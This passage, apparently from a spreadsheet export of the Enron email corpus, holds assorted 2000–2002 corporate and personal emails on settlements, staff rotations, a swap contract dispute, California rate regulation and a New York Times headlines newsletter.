_x000D_
We will e-mail the conference room location when it is confirmed._x000D_
_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Rose_x000D_
</t>
  </si>
  <si>
    <t>Thu, 10 Jan 2002 09:30:50 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: Weather Settlements</t>
  </si>
  <si>
    <t>Sally - per our discussion this morning regarding Todd's issue please see the follow-up message from Evelyn below.  I have left a message for Todd to call me as well as spoken with Kevin Sweeney.  Kevin and I will be meeting in the next few days to ensure that on a going forward basis all the gaps are identified and closed.  If you have any questions, let me know.  Thanks, Leslie_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Aucoin, Evelyn  _x000D_
Sent:	Thursday, January 10, 2002 10:30 AM_x000D_
To:	Reeves, Leslie_x000D_
Subject:	Weather Settlements_x000D_
_x000D_
Scott Tacket has made numerous requests for the deal spec information he needs to process settlements and he does not have it yet. He is contacting Todd Hall about it again and stressing that it is urgent._x000D_
_x000D_
Evelyn Aucoin_x000D_
Director_x000D_
Financial Settlements_x000D_
713-853-5686_x000D_
EB2129</t>
  </si>
  <si>
    <t>Tue, 5 Sep 2000 14:23:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">This e-mail is kind of funny._x000D_
---------------------- Forwarded by John J Lavorato/Corp/Enron on 09/05/2000 _x000D_
09:18 PM ---------------------------_x000D_
_x000D_
_x000D_
Vince J Kaminski@ECT_x000D_
08/21/2000 12:58 PM_x000D_
To: Shelly Butler/HOU/ECT@ECT_x000D_
cc: John J Lavorato/Corp/Enron@Enron, Jeffrey A Shankman/HOU/ECT@ECT, Hunter _x000D_
S Shively/HOU/ECT@ECT, Vince J Kaminski/HOU/ECT@ECT _x000D_
_x000D_
Subject: Re: Vikas Dwivedi  _x000D_
_x000D_
Shelly,_x000D_
_x000D_
I shall not accept anybody for a rotation without a prior interview._x000D_
_x000D_
Li was scheduled to meet with me last Thursday but  she never showed _x000D_
up. She did not call to cancel or to apologize for not showing up._x000D_
I have not seen her resume. _x000D_
_x000D_
Please, assume she is not rotating into my group till further notice._x000D_
_x000D_
Vince_x000D_
 _x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Shelly Butler                           08/18/2000 03:37 PM_x000D_
	_x000D_
_x000D_
To: Jeffrey A Shankman/HOU/ECT@ECT_x000D_
cc: Hunter S Shively/HOU/ECT@ECT, John J Lavorato/Corp/Enron@Enron, Vince J _x000D_
Kaminski/HOU/ECT@ECT, Craig Breslau/HOU/ECT@ECT, Ina Rangel/HOU/ECT@ECT _x000D_
Subject: Vikas Dwivedi  _x000D_
_x000D_
Jeff,_x000D_
_x000D_
Just wanted to confirm that Li will be placed in Vince Kaminski's group.  _x000D_
Vikas has been placed in ENA Middle Market reporting to Craig Breslau.  _x000D_
Please contact me at 3-4584 if you have any questions.  Thanks for your help!!_x000D_
_x000D_
Shelly_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Jeffrey A Shankman                           08/18/2000 03:18 PM_x000D_
	_x000D_
_x000D_
To: Shelly Butler/HOU/ECT@ECT_x000D_
cc: Hunter S Shively/HOU/ECT@ECT, John J Lavorato/Corp/Enron@Enron _x000D_
Subject: _x000D_
_x000D_
Shelly, _x000D_
_x000D_
Hunter spoke with Li today and agrees that her first rotation should be in _x000D_
Vince's group doing modelling, etc.  This will give her the broadest _x000D_
experience for a first rotation.  I'm sure the other person in question, _x000D_
Vikas, will do very well in Hunter's group.  _x000D_
_x000D_
Thanks for your help._x000D_
_x000D_
Jeff_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 18 May 2001 04:37:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Suggestion for Advisory Committee</t>
  </si>
  <si>
    <t xml:space="preserve">As you know, Ken has talked to Larry Summers about serving on Enron's Board _x000D_
of Directors.  Larry told Ken that in light of his selection to head Harvard, _x000D_
he wants to hold off going on any corporate boards for now.  My understanding _x000D_
is that Larry will most likely accept Ken's offer at the end of the year.   _x000D_
_x000D_
In the meantime, let me suggest a candidate for Enron's Advisory Committee.  _x000D_
Lee Sachs was Assistant Secretary of Treasury for Financial Markets under Bob _x000D_
Rubin and Larry.  Lee coordinated the energy negotiations for Larry at the _x000D_
end of the Clinton Administration.  You probably met Lee at those meetings.  _x000D_
Lee is brilliant.  He was a Managing Director at Bear Sterns before joining _x000D_
the Treasury team.  He is a huge fan of Enron and is constantly telling me _x000D_
how extremely well positioned Enron is for the future.  He has done _x000D_
considerable research on our business model and is constantly talking to his _x000D_
buddies on Wall Street about us.  Lee will undoubtedly be a significant _x000D_
player in any future Democratic Administration.  I know he would be an _x000D_
invaluable addition to this Committee.  He has not decided what he is going _x000D_
to do next, but has several extremely good offers on the table from large _x000D_
investment firms and hedge funds. None of these would conflict with this type _x000D_
of activity.   I thought I would plant this suggestion with you not knowing _x000D_
exactly how these things are done.  </t>
  </si>
  <si>
    <t>Tue, 5 Feb 2002 04:36:26 -0800 (PST)</t>
  </si>
  <si>
    <t>Today's Headlines from NYTimes.com Tuesday, February 5, 2002</t>
  </si>
  <si>
    <t>_x000D_
[IMAGE]=09_x000D_
 [IMAGE]    Search NYTimes.com  Today's News Past Week Past 30 Days Past 90=_x000D_
 Days Past Year Since 1996  =09_x000D_
  [IMAGE]  [IMAGE]       Customize This E-Mail   [IMAGE]  Customize This E-=_x000D_
Mail      =09_x000D_
   February 5, 2002   QUOTE OF THE DAY "I got 3,500 over 10 years, but our =_x000D_
friend, Kay Bailey Hutchison, she got 99,000. Heck, I'm the chairman of the=_x000D_
 committee. That wasn't a contribution. That was an insult."  ERNEST F. HOL=_x000D_
LINGS, chairman of the Senate Commerce Committee, when asked if he had rece=_x000D_
ived contributions from Enron.   NATIONAL Bush's Aggressive Accounting  In =_x000D_
short, the administration's strategy is to prevent criticism of what amount=_x000D_
s to a fiscal debacle by wrapping its budget in the flag.   Cutting Taxes F=_x000D_
aster Would Help Everyone  Government can't inject money into an economy un=_x000D_
less it first   takes the money out.   Security Kicks in Before the Winter =_x000D_
Games  With opening ceremonies just four days away, all the plans to keep t=_x000D_
he Winter Olympics  safe are kicking in.     MORE NATIONAL NEWS    Advertis=_x000D_
ement    Sign up now for exclusive Classical Music  concerts and premium co=_x000D_
ntent!  andante is your source for classical music  on the Internet. Exclus=_x000D_
ive concerts from the  most prestigious ensembles. Over 23,000  concerts li=_x000D_
sted. In-depth virtual library.  Sign up now and enjoy the benefits of Char=_x000D_
ter  Membership!   [IMAGE]   INTERNATIONAL Annan Cautions Business as World=_x000D_
 Forum Ends  The United Nations chief closed the World Economic Forum by te=_x000D_
lling business leaders that "business cannot afford to be seen as the probl=_x000D_
em."   Iraq Proposes U.N. Talks, and Gets a Wary Reply  Iraq's offer for ta=_x000D_
lks had all the hallmarks of an attempt by its leader, Saddam Hussein, to b=_x000D_
uild up international resistance to an American attack.   Israeli's Dual Jo=_x000D_
b: Chief of Defense, and Dissent  The man proposing to lead a coalition to =_x000D_
unseat the prime minister is also in charge of leading the military methods=_x000D_
 the coalition is attacking.     MORE INTERNATIONAL NEWS    BUSINESS Senato=_x000D_
rs to Vote to Issue Subpoena to Ex-Enron Chief  Republicans and Democrats o=_x000D_
n the Senate Commerce Committee said they would vote Tuesday to issue a sub=_x000D_
poena to compel an appearance by Kenneth L. Lay.   Deal at Enron Gave Insid=_x000D_
ers Quick Fortunes  A small group of insiders at Enron made millions in pro=_x000D_
fits in secret deals with some of the partnerships that ultimately brought =_x000D_
the company to its knees.   Ernst &amp; Young Latest Auditor Moving to Alter So=_x000D_
me Practices  Ernst &amp; Young said that it would stop selling information tec=_x000D_
hnology services to companies it audits and that it would no longer serve a=_x000D_
s internal accountant and external auditor at the same company.     MORE BU=_x000D_
SINESS NEWS    TECHNOLOGY Hewlett Lifts Profit Outlook and Each Side in War=_x000D_
 Exults  Both sides in the spirited proxy contest over Hewlett-Packard's pl=_x000D_
an to buy Compaq Computer pointed to HP's performance, which was better tha=_x000D_
n expected, as proof of their claims.   Williams Companies Lists Possible S=_x000D_
teps to Bolster Rating  The Williams Companies said that it planned to step=_x000D_
 up asset sales and that it might issue shares to strengthen its balance sh=_x000D_
eet and retain its investment-grade credit rating.   Muslims Feel Sept. 11 =_x000D_
Chill as Mecca Plays It Safe  The Saudis have begun collecting personal dat=_x000D_
a from Muslim visitors to start a system for tracking and identifying them.=_x000D_
     MORE TECHNOLOGY NEWS    POLITICS As Troubles Multiply, the Budget Equa=_x000D_
tion Changes  On Monday, President Bush sent Congress a new budget plan, wh=_x000D_
ich has little extra money for anything other than national security and ta=_x000D_
x cuts.   Senators to Vote to Issue Subpoena to Ex-Enron Chief  Republicans=_x000D_
 and Democrats on the Senate Commerce Committee said they would vote Tuesda=_x000D_
y to issue a subpoena to compel an appearance by Kenneth L. Lay.   Anti-Tax=_x000D_
 Leader Confesses He Used Campaign Money  Tim Eyman, a businessman who was =_x000D_
the champion of several tax-cutting initiatives in Washington State, said o=_x000D_
n Monday that he had profited personally from political fund-raising drives=_x000D_
.     MORE POLITICS NEWS    SPORTS When Push Came to Shove, Patriots Did Bo=_x000D_
th  The Patriots exerted their will on the Rams and forced the Super Bowl t=_x000D_
o be played on their terms.   Introverted Coach Finally Out of His Shell  A=_x000D_
s a winning Super Bowl coach, the Patriots' Bill Belichick has attained a s=_x000D_
tature that for years was thought to be beyond his personality.   In Great =_x000D_
Matchup, Only Nets Are Great  Led by Keith Van Horn's 25 points, the Nets t=_x000D_
ook apart the Kings, who had the N.B.A.'s best record entering the lopsided=_x000D_
 game.     MORE SPORTS NEWS    ARTS Restoration of a Leonardo Is Ruled Out =_x000D_
 Critics of the proposed restoration of "The Adoration of the Magi" see the=_x000D_
 decision as a moral victory and a personal vindication.   WNYC-FM Reassess=_x000D_
es Program Format  Station managers are studying whether to cut back perman=_x000D_
ently on classical music as part of a larger plan to revamp all of its prog=_x000D_
ramming.   A Dead Man's Failed Muse and Lost Women  Athol Fugard's "Sorrows=_x000D_
 and Rejoicings" is a   play about irrevocably divided selves.     MORE ART=_x000D_
S NEWS    NY REGION Electricity Crisis Eases in New York  New York City, wh=_x000D_
ich faced an electricity crisis last summer, now has all the energy it need=_x000D_
s through at least mid-2003 and perhaps beyond, experts say.   So Long New =_x000D_
York, and Thanks for a Mostly Well-Ordered Bash  In the end, the World Econ=_x000D_
omic Forum went off so smoothly that  aside from some minor traffic inconve=_x000D_
niences  the lives of most New Yorkers were unaffected.   In Albany, School=_x000D_
 Boards Lose Backing  Black and Hispanic members of the State Assembly are =_x000D_
saying New York City's community school boards have failed minority communi=_x000D_
ties.     MORE NY REGION NEWS    OP-ED  Bush's Aggressive Accounting   By  =_x000D_
PAUL KRUGMAN  In short, the administration's strategy is to prevent critici=_x000D_
sm of what amounts to a fiscal debacle by wrapping its budget in the flag. =_x000D_
  The Wrong Lessons of the Somalia Debacle   By NICHOLAS D. KRISTOF  With l=_x000D_
uck, Afghanistan will again prove that helping war-torn third-world countri=_x000D_
es is a smarter policy than running away from them.   Is the Human Rights E=_x000D_
ra Ending?   By MICHAEL IGNATIEFF  If Washington   turns away, the human ri=_x000D_
ghts movement loses the   one government whose power can be   decisive in s=_x000D_
topping human rights   abuses.     MORE OP-ED  NEWS    About This E-Mail Yo=_x000D_
u received these headlines because you requested The New York Times Direct =_x000D_
e-mail service. To sign up for other newsletters, cancel delivery, change d=_x000D_
elivery options or your e-mail address, see http://www.nytimes.com/email . =_x000D_
  Check or un-check the headlines you would like to receive or cancel and r=_x000D_
emember to go to the bottom of the page and click on "Save Selections."  Su=_x000D_
ggestions and feedback are welcome at feedback@nytimes.com .   Please inclu=_x000D_
de the following ID number when writing to feedback@nytimes.com   so that w=_x000D_
e can track any reports of problems: 7061593   How to Advertise For informa=_x000D_
tion on advertising in e-mail newsletters or other advertising opportunitie=_x000D_
s with NYTimes.com, contact onlinesales@nytimes.com  or visit our online me=_x000D_
dia kit .  Copyright 2002 The New York Times Company    =09_x000D_
_x000D_
[IMAGE]</t>
  </si>
  <si>
    <t>Sat, 4 Nov 2000 08:55:00 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: ?</t>
  </si>
  <si>
    <t xml:space="preserve">OK.  Looks like Saturday's out.  I'm game for tomorrow.  Morning?  _x000D_
Afternoon?  We can meet at my office if you'd like, or at a cafe.  Let me _x000D_
know._x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
_x000D_
_x000D_
_x000D_
	Kimberly Kupiecki &lt;kkupiecki@arpartners.com&gt;_x000D_
	11/03/2000 07:26 PM_x000D_
		 _x000D_
		 To: Jacqueline Kelly &lt;JKelly@FairIsaac.com&gt;_x000D_
		 cc: "'Jeff.Dasovich@enron.com'" &lt;Jeff.Dasovich@enron.com&gt;, Jacqueline Kelly _x000D_
&lt;JKelly@FairIsaac.com&gt;, kupiecki@haas.berkeley.edu, "'tedchin@hotmail.com'" _x000D_
&lt;tedchin@hotmail.com&gt;_x000D_
		 Subject: RE: ?_x000D_
_x000D_
Hello everyone,_x000D_
_x000D_
I thought I missed something last night - there were four accidents on my _x000D_
way home so I didn't even get into the city until 7:30 pm.  I checked my _x000D_
email and didn't see anything so I don't feel so guilty now._x000D_
_x000D_
I can meet on the weekend whenever._x000D_
_x000D_
_x000D_
_x000D_
At 01:05 PM 11/3/00, Jacqueline Kelly wrote:_x000D_
&gt;Look who you are talking to...of course we didn't meet.  I'm around this_x000D_
&gt;weekend.  Will to work on a spreadsheet before hand.  Otherwise we can meet_x000D_
&gt;during break or next Wednesday._x000D_
&gt;_x000D_
&gt;Whatta ya think?_x000D_
&gt;_x000D_
&gt;-----Original Message-----_x000D_
&gt;From: Jeff.Dasovich@enron.com [mailto:Jeff.Dasovich@enron.com]_x000D_
&gt;Sent: Friday, November 03, 2000 12:53 PM_x000D_
&gt;To: JKelly@fairisaac.com; kupiecki@haas.berkeley.edu_x000D_
&gt;Subject: ?_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;I have NO idea how I sent the email to jackie at kim's email address._x000D_
&gt;apologies.  i'm losing it._x000D_
&gt;_x000D_
&gt;did you guys meet last nite to discuss the project?  If not, do you want to_x000D_
&gt;meet this weekend for a wee bit to discuss?  i'm in town.  just let me_x000D_
&gt;know.  i can't find ted's email on any notes and i'm too lazy (flaky) to_x000D_
&gt;search it out._x000D_
&gt;_x000D_
&gt;best,_x000D_
&gt;Jeff_x000D_
&gt;----- Forwarded by Jeff Dasovich/NA/Enron on 11/03/2000 02:49 PM -----_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;                     Jeff Dasovich_x000D_
&gt;_x000D_
&gt;                     Sent by: Jeff        To:     Jacqueline Kelly_x000D_
&gt;&lt;JKelly@arpartners.com&gt;_x000D_
&gt;                     Dasovich             cc:_x000D_
&gt;_x000D_
&gt;                                          Subject:     Reschedule the_x000D_
&gt;Meeting?(Document_x000D_
&gt;                                          link: Jeff Dasovich)_x000D_
&gt;_x000D_
&gt;                     11/01/2000_x000D_
&gt;_x000D_
&gt;                     08:19 PM_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;My schedule has blown apart for tomorrow--traveling.  Possible to meet this_x000D_
&gt;weekend to discuss the project?  Either day's fine with me.  Apologies for_x000D_
&gt;the last minute change._x000D_
&gt;_x000D_
&gt;Best,_x000D_
&gt;Jeff_x000D_
_x000D_
_x000D_
Kimberly Kupiecki_x000D_
Director_x000D_
A&amp;R Partners_x000D_
kkupiecki@arpartners.com_x000D_
(650) 762 2800 main_x000D_
(650) 762 2825 direct_x000D_
fax (650) 762 2801_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 15 Mar 2002 13:33:24 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'kevin.hyatt@enron.com', 'lorraine.lindberg@enron.com'})</t>
  </si>
  <si>
    <t>El Paso Capacity Allocation</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
The order has not been issued yet, but attached is the Staff presentation from the FERC meeting. Thought you might want to see this.  _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 5 Nov 2001 13:24:36 -0800 (PST)</t>
  </si>
  <si>
    <t>RE-ORG</t>
  </si>
  <si>
    <t>Rick --_x000D_
_x000D_
Are you going to put out the new org chart by this Friday?_x000D_
_x000D_
Jim</t>
  </si>
  <si>
    <t>Wed, 3 Oct 2001 10:26:54 -0700 (PDT)</t>
  </si>
  <si>
    <t>LADWP</t>
  </si>
  <si>
    <t xml:space="preserve">Kim, Russel Diamond is going to provide to you a complete overview of deals, power and gas, and MTM positions, plus contractual status. You should get a copy of the master documents. ( this will include credit covenants)._x000D_
_x000D_
Also, can I have a summary of LADWP, how they operate, how they are paid.... Russel will have this to you by tommorow. Pls have the consolidated package for me prior to my departure at 1:30 to Las Vegas._x000D_
_x000D_
BT </t>
  </si>
  <si>
    <t>Tue, 16 Jan 2001 02:53:00 -0800 (PST)</t>
  </si>
  <si>
    <t>no.  i was dead on sat night.  i was out late on fri.  it was fun.  you _x000D_
should have stayed out.</t>
  </si>
  <si>
    <t>Wed, 27 Dec 2000 07:04:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Salerno Timeline</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Richard B Sanders/HOU/ECT on 12/27/2000 03:08 PM -----_x000D_
_x000D_
=09Alan Engberg_x000D_
=0911/17/2000 09:25 AM_x000D_
=09=09=20_x000D_
=09=09 To: Sara Shackleton/HOU/ECT@ECT, Richard B Sanders/HOU/ECT@ECT_x000D_
=09=09 cc: Douglas S Friedman/HOU/ECT@ECT, Jason R Williams/NA/Enron@ENRON_x000D_
=09=09 Subject: Salerno Timeline_x000D_
_x000D_
Salerno Swap Agreement =01) Discussion Timeline_x000D_
Salerno deal: 6 months, Nov =01,00 =01) Apr =01,01, LLDPE swap sold at 39.5=_x000D_
 cpp basis=20_x000D_
CMAI mid._x000D_
Deal discussed Oct 2-6, verbal agreement was reached on the 5th.  Faxed=20_x000D_
non-binding indication sheet initialed by Bob Lampo on Oct 5._x000D_
_x000D_
10/03, Tues: Salerno calls requesting quote, we quote verbally a couple hou=_x000D_
rs=20_x000D_
later that same day._x000D_
_x000D_
10/05, Thur: Conversations during which Bob negotiates price and we hold=20_x000D_
firm.  Also conversations during which I question him about whether or not =_x000D_
he=01,_x000D_
s back to backing the deal and what are his motivations for entering into t=_x000D_
he=20_x000D_
deal.  He wouldn't elucidate on any of the questions.  Finally discussions=_x000D_
=20_x000D_
regarding the need for a credit check, and the likely requirement for an LC=_x000D_
. =20_x000D_
He asked at that point how large an LC would be required, I informed that I=_x000D_
=20_x000D_
didn=01,t know but that it depended on credit=01,s review of his business a=_x000D_
nd of=20_x000D_
our forward view on the market.  We agreed on price and all commercial=20_x000D_
terms.  I informed that I would fax an indication sheet and that he should=_x000D_
=20_x000D_
initial it then return it to me by fax to indicate his approval of the deal=_x000D_
. =20_x000D_
He did so._x000D_
_x000D_
10/11, Wed: conversation regarding financial docs being sent to credit=20_x000D_
(details in tape transcript)._x000D_
_x000D_
10/17, 19 or 20: messages from Bob asking for clarification on the confirm.=_x000D_
 =20_x000D_
Message from me roughly explaining the salient points of the confirm. =20_x000D_
Subsequent conversation sharing the good news that he=01,d been granted a c=_x000D_
redit=20_x000D_
line of $250k and for exposure beyond that he=01,d have to post an LC.  No=_x000D_
=20_x000D_
indication of any refusal of our terms at that point (details once tapes=20_x000D_
reviewed).=20_x000D_
_x000D_
10/23-27: no conversations that I can recall_x000D_
_x000D_
10/30, Mon:  Received Salerno message communicating intention to renege=20_x000D_
(vacation day)_x000D_
_x000D_
10/31, Tue: Legal advised.  Bob=01,s message forwarded_x000D_
_x000D_
11/1, Wed: travelling..msg left with Bob Lampo at Salerno stating that our=_x000D_
=20_x000D_
position was that a deal was in place as he faxed to us our term sheet with=_x000D_
=20_x000D_
his initials and we had done a credit check giving him a line of credit._x000D_
_x000D_
11/2, Thu: Confirms sent to legal_x000D_
_x000D_
11/3, Fri: Legal calls Salerno.  Message left._x000D_
_x000D_
11/6-9, Mon to Thu: messages traded with legal_x000D_
_x000D_
11/10, Fri: Legal recommends pulling the tapes.=20_x000D_
_x000D_
11/14, Tues: Legal calls Salerno.  Message left.  Bob responds with his own=_x000D_
=20_x000D_
message.  Bob doesn=01,t dispute price but does dispute credit terms and us=_x000D_
es=20_x000D_
this as basis to drop the deal.   Tapes received.   Transcripts of Nov 11=_x000D_
=20_x000D_
conversation made.  Additional tapes requested for 10-16, 19, 20._x000D_
_x000D_
11/16, Thur: Meeting with Richard, Sara, Jay, Doug and Alan.  Message left=_x000D_
=20_x000D_
with Bob Lampo informing that we were willing to work with him on addressin=_x000D_
g=20_x000D_
his credit issues.  Call not yet returned._x000D_
</t>
  </si>
  <si>
    <t>Tue, 12 Sep 2000 04:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: houston, we have a problem....?</t>
  </si>
  <si>
    <t>Thanks for the email.  Your candid comments make me wish I was over there _x000D_
right now sitting in a pub with you and Katy drinking a pint.  I am in full _x000D_
agreement that guys suck and have discovered through this situation an area _x000D_
in which 23 does not differ from 31...cowardess (As my Dad so eloquently put _x000D_
it, "He's just chicken-shit").  So, the plan of attack for the time being is _x000D_
none.  I am not going to do anything (that means no emails, no phone calls, _x000D_
no nothing).  Of course it's a lot easier to say that knowing he's in an _x000D_
entirely different state vs. two floors down from me, so next week will be _x000D_
the true test.  You will be happy to know, however, that I do have a good _x000D_
support system in Monique.  She is a firm advocate of the "drop him and make _x000D_
him work should he happen to come crawling back" school.  You know what _x000D_
really kills me though is the thought that, yet again, I will ultimately be _x000D_
disappointed by someone I truly expected more out of (I keep thinking about _x000D_
all the times I said "I'm just waiting for the other shoe to drop." - well, _x000D_
it dropped) .  Anyway, I've have decided to throw myself into work, books, _x000D_
exercise, etc. in a effort to distract my mind from other things - it's kind _x000D_
of working.  _x000D_
_x000D_
I'm really glad you are in enjoying things so much right now.  You have to _x000D_
email me back with more details regarding the new pad, like will there be _x000D_
enough room for me to crash there when I come to visit (if not, I'm sure Nick _x000D_
would put me up - scarey).  Also, I sent Katy an email about coming to visit _x000D_
so hopefully we can get everything squared away soon.  FYI:  The Longhorns _x000D_
beat Louisiana Lafayette 52-10 last Saturday (the game was fun, but extremely _x000D_
HOT!!!), it was a real nail biter.  _x000D_
Talk to you soon,_x000D_
_x000D_
Sue_x000D_
_x000D_
*** Don't worry about me thinking any of this is in any way due to a _x000D_
shortcoming on my part.  I don't.  Rather, I am convinced he wasn't expecting _x000D_
the full package when we first went out and as soon as he realized that I _x000D_
was, he freaked.  I'm beginning to think it's more than just a coincidence _x000D_
that the last time we went out I let down one of the last walls I was holding _x000D_
up as far as trusting him and it was right after that that he started acting _x000D_
aloof. (Things that make you go hmmm.)</t>
  </si>
  <si>
    <t>Fri, 10 Aug 2001 08:57:06 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'james_d_steffes@enron.com', 'jbennett@gmssr.com', 'jdasovic@enron.com'})</t>
  </si>
  <si>
    <t>RE: CPUC Authority to Adjust Rates</t>
  </si>
  <si>
    <t xml:space="preserve">Jeanne --_x000D_
_x000D_
Not quite sure that I am getting the picture.  Let me lay it out more directly._x000D_
_x000D_
The PX Credit for October 2000 was $225 based on the actual market rates._x000D_
_x000D_
Now FERC is saying that October 2000 hourly prices for CalPX DA and CalPX HA markets were "too high" in June 2001.  Can the CPUC change the PX Credit for October 2000 and make the Utilities recalculate our Negative CTC?_x000D_
_x000D_
What is prospective?  Have they ever done this before?_x000D_
_x000D_
Jim_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	JBennett &lt;JBennett@GMSSR.com&gt;@ENRON [mailto:IMCEANOTES-JBennett+20+3CJBennett+40GMSSR+2Ecom+3E+40ENRON@ENRON.com] _x000D_
Sent:	Thursday, August 09, 2001 7:35 PM_x000D_
To:	Jeff Dasovich (E-mail); Jim Steffes (E-mail)_x000D_
Subject:	CPUC Authority to Adjust Rates_x000D_
_x000D_
Jeff and Jim --_x000D_
_x000D_
I have done some research into the issue of whether the CPUC would be able_x000D_
to restate the UDC's PX Energy Charges (and thus PX Credits) back to October_x000D_
if the FERC were to apply its mitigation plan back that far. Thus far, my_x000D_
research indicates that the answer is yes (or at least there is a strong_x000D_
argument that the answer is yes) and it would not violate the rule against_x000D_
retroactive rate making.  The reasoning is as follows:_x000D_
_x000D_
The Commission (as affirmed by the courts) have ruled that they may subject_x000D_
a utility's rates to refund to account for adjustments made pursuant to a_x000D_
methodology or formula adopted before the date the utility's rates became_x000D_
subject to refund. Thus any ratemaking is considered prospective because the_x000D_
formulas are in place before the utility's rates are made subject to refund._x000D_
The PX Energy Charge is calculated pursuant to the formula/mechanism set_x000D_
forth in the utility's tariffs.  These charges were always subject to_x000D_
adjustment on a prospective basis due to the settlement process.  The change_x000D_
in energy prices which would be effected by the FERC ruling could very well_x000D_
be viewed as an adjustment made pursuant to a formula.  Thus the change_x000D_
would not be considered retroactive ratemaking._x000D_
_x000D_
I had a chance to talk with Mike Day for a couple of minutes about this_x000D_
issue.  He concurred with my analysis._x000D_
_x000D_
Jeanne_x000D_
_x000D_
P.S. Please forward this e-mail to anyone you think needs to see it.     </t>
  </si>
  <si>
    <t>Wed, 19 Sep 2001 08:00:26 -0700 (PDT)</t>
  </si>
  <si>
    <t>ERV Notification:  (Violation/Notification Memo - 09/18/2001)</t>
  </si>
  <si>
    <t>The report named: Violation/Notification Memo &lt;http://erv.corp.enron.com/linkFromExcel.asp?report_cd=60&amp;report_name=Violation/Notification+Memo&amp;category_cd=2&amp;category_name=ENRON%20CONSOLIDATED&amp;toc_hide=1&amp;sTV1=2&amp;TV1Exp=Y&amp;current_efct_date=09/18/2001&gt;, published as of 09/18/2001 is now available for viewing on the website.</t>
  </si>
  <si>
    <t>Mon, 11 Sep 2000 10:23:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'bfpjv@c-zone.net', 'taschehoug@thermoecotek.com', 'kfickett@usgen.com', 'rescalante@riobravo-gm.com', 'jackp@calpine.com', 'siliff@riobravo-gm.com', 'tcortopassi@ogden-energy.com', 'william_carlson@wastemanagement.com', 'fmisseldine@caithnessenergy.com', 'susan_j_mara@enron.com', 'lale@dynegy.com', 'rpelote@energy.twc.com', 'billw@calpine.com', 'steve_ponder@fpl.com', 'dnelsen@gwfpower.com', 'nam.nguyen@powersrc.com', 'cody.carter@williams.com', 'rjhickok@duke-energy.com', 'wfhall2@duke-energy.com', 'emaddox@seawestwindpower.com', 'freesrj@apci.com', 'gtbl@dynegy.com', 'dean_gosselin@fpl.com', 'khoffman@caithnessenergy.com', 'frank.derosa@gen.pge.com', 'snoll@thermoecotek.com', 'hellertj@apci.com', 'pete@calwind.com', 'rllamkin@seiworldwide.com', 'twetzel@thermoecotek.com', 'wscobee@caithnessenergy.com', 'marty_mcfadden@ogden-energy.com', 'sdl@calwind.com', 'jdasovic@enron.com', 'ed.tomeo@uaecorp.com', 'joe.greco@uaecorp.com', 'rboyd@enron.com', 'cabaker@duke-energy.com', 'paula_soos@ogden-energy.com', 'eileenk@calpine.com', 'curt.hatton@gen.pge.com', 'dparque@ect.enron.com', 'elliottsa@earthlink.net', 'joer@calpine.com', 'jweisgall@aol.com', 'curtis_l_kebler@reliantenergy.com'})</t>
  </si>
  <si>
    <t>Fw: Market Response</t>
  </si>
  <si>
    <t>IEP is continueing to cover the various CPUC/FERC/Fed Hearings in San Diego_x000D_
related to the California marketplace.  We are doing this under the auspices_x000D_
of the Market Response Project.  Below is a brief summary from Doug Kerner_x000D_
regarding the series of San Diego Hearings last week._x000D_
_x000D_
IEP also is preparing draft comments in response to CPUC Commissioner Wood's_x000D_
OII on Market Structure.  This will be circulated for your review and_x000D_
comment in the very near future._x000D_
_x000D_
_x000D_
----- Original Message -----_x000D_
From: Eric Janssen &lt;EricJ@eslawfirm.com&gt;_x000D_
To: 'Steven Kelly' &lt;steven@iepa.com&gt;_x000D_
Cc: 'Katie Kaplan' &lt;kaplan@iepa.com&gt;; 'Jan Smutny-Jones' &lt;smutny@iepa.com&gt;_x000D_
Sent: Monday, September 11, 2000 3:39 PM_x000D_
Subject: Market Response_x000D_
_x000D_
_x000D_
&gt; Steven,_x000D_
&gt;_x000D_
&gt; On IEP's instruction, I've paid attention to, and attended to the minimal_x000D_
&gt; extent necessary, Commission proceedings on the investigation into_x000D_
&gt; "wholesale" rate problems - with particular emphasis on SDG&amp;E, as one_x000D_
would_x000D_
&gt; expect._x000D_
&gt;_x000D_
&gt; A prehearing conference in the Order Instituting Investigation (OII) into_x000D_
&gt; these issues was held on August 29, 2000 in San Diego.  It was_x000D_
enlightening,_x000D_
&gt; for reasons I next discuss, and reaffirms pursuit of a strategic attitude_x000D_
&gt; for IEP which we previously have discussed._x000D_
&gt;_x000D_
&gt; What I found enlightening was that a) the "consumer" representation was at_x000D_
&gt; an organized and well-informed level.  Speakers for this constituency were_x000D_
&gt; from, for example, the Chamber of Commerce, the League of Women Voters and_x000D_
&gt; AARP.  All had done their research and were almost uniform in their_x000D_
interest_x000D_
&gt; in retail issues, as opposed to the obvious "greedy generator" issues_x000D_
which_x000D_
&gt; certain members of the government institutions have attempted to focus on._x000D_
&gt; These presentations were followed up nicely by a small, but significant,_x000D_
&gt; number of ESPs who presented or represented offers to provide new and_x000D_
&gt; interesting retail products if only the CPUC would get out of the way._x000D_
&gt;_x000D_
&gt; I limited my presentation to the end, focusing on the procedural point_x000D_
that_x000D_
